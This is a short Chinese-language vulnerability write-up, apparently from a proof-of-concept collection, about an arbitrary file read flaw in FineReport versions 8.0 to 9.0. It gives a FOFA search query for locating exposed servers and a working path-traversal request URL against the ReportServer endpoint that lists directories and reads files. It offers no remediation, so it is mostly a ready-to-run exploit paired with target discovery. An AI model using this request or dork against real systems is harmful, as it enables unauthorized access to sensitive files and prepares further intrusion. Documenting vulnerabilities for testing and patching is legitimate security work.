帆软报表 v8.0 - 9.0 存在任意文件读取漏洞.md
774 B / 2021-07-15 20:13:38
## 帆软报表 v8.0 - 9.0 存在任意文件读取漏洞
## 漏洞描述
FineReport v8.0 - 9.0 任意文件读取漏洞,攻击者可以通过此漏洞获取敏感信息,为下一步攻击做准备。
## 漏洞影响
> FineReport v8.0
>
> FineReport v9.0
## FOFA
> body="isSupportForgetPwd"
## POC
登录界面如下:
![1](/resource/帆软报表/1.jpg)
查看当前目录路径
```
http://<target>/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..¤tUserName=admin¤tUserId=1&isWebReport=true
```
![2](/resource/帆软报表/2.jpg)
进一步读取此目录下的其他文件
![3](/resource/帆软报表/3.jpg)
可以通过../对目录进行遍历,从而获取自己想要的信息
![4](/resource/帆软报表/4.jpg)